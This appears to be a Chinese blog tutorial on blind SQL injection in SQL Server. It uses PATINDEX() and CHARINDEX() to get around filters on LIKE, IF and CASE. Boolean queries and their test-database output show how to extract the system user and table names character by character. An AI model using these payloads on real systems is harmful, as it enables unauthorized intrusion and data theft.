0x01 概要
日站过程中有过滤是很正常的事情.
本方法适用于 过滤了 like, if, CASE
也就是 like 注入无法正常使用,但是页面又没有回显的情况
| like 替换方法 | 解释 |
|---|---|
| PATINDEX(‘%pattern%’, expression) | 返回pattern字符串在表达式expression里第一次出现的位置,起始值从1开始算,没有返回0 该函数与 like 高度保持一致,并且可以和 like 一样 使用 _ % [ ] [^]这种通配符进行搜索 |
| CHARINDEX(‘pattern’, expression) | 返回pattern字符串在表达式expression里第一次出现的位置,起始值从1开始算,没有返回0 |
0x02 测试数据
1> select * from article;2> go+----+-----------+-----------+| id | title | content |+----+-----------+-----------+| 1 | 测试标题 | 测试内容 || 2 | 测试标题2 | 测试内容2 |+----+-----------+-----------+(2 rows affected)
# 测试表数据: users;sql server> select * from users;+----+--------------+----------+| id | username | password |+----+--------------+----------+| 1 | test-user-01 | 123456 || 2 | test-user-02 | 234567 |+----+--------------+----------+2 rows in set (0.00 sec)
sql server> SELECT system_user;+-----------------------+| field1 |+-----------------------+| sa |+-----------------------+1 row in set (0.00 sec)
sql server> select db_name();+-----------------------+| field1 |+-----------------------+| test |+-----------------------+1 row in set (0.00 sec)
0x02 PATINDEX()
0x02.1 查询user
SQL:select ‘test’ where patindex(‘%sa%’, system_user)>=1;
# system_user = sa# 对的情况1> select 'test' where patindex('%sa%', system_user)>=1;2> go+-----+| |+-----+| test |+-----+(1 rows affected)# 错误的情况1> select 'test' where patindex('%aaa%', system_user)>=1;2> go+--+| |+--++--+(0 rows affected)
0x02.2 查询表名
注意:
OVER(Order by table_name) 里面的 name 要修改为 test.dbo.sysobjects 表里面存在的一个字段
查询不同的库可以这样
例如现在有 test库 与 test2库
那么就可以这样调用
test.dbo.sysobjects
test2.dbo.sysobjects
查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2
注意:
XType=’U’ 表示获取某数据库的所有用户表;
XType=’S’ 表示获取某数据库的所有系统表;
例如现在查询得是 test 库得表名
SQL:select ‘test’ where patindex(‘%article%’, (select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))>=1
# 第一张表名 = article# 对的情况1> SELECT'test'WHEREpatindex('%article%',(SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1)) >= 1;2> go+-----+| |+-----+| test |+-----+(1 rows affected)# 错误的情况1> SELECT'test'WHEREpatindex('%aaaaaaaaaaaaaa%',(SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1)) >= 1;2> go+--+| |+--++--+(0 rows affected)
0x03 CHARINDEX()
0x03.1 查询user
SQL:select ‘test’ where charindex(‘s’, system_user)>=1
# system_user = sa# 对的情况# system_user第一个字符1> select 'test' where charindex('s', system_user)>=12> go+-----+| |+-----+| test |+-----+(1 rows affected)# system_user第二个字符1> select 'test' where charindex('sa', system_user)>=12> go+-----+| |+-----+| test |+-----+(1 rows affected)# 错误的情况1> select 'test' where charindex('aaaaa', system_user)>=12> go+--+| |+--++--+(0 rows affected)
0x03.2 查询表名
SQL:select ‘test’ where charindex(‘ar’, (select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))>=1
# 第一张表名 = article# 对的情况# 查询前1-2字符1> SELECT'test'WHEREcharindex('ar',(SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1)) >= 1;2> go+-----+| |+-----+| test |+-----+(1 rows affected)# 查询1-4个字符1> SELECT'test'WHEREcharindex('arti',(SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1)) >= 1;2> go+-----+| |+-----+| test |+-----+(1 rows affected)
若有收获,就点个赞吧
0 人点赞
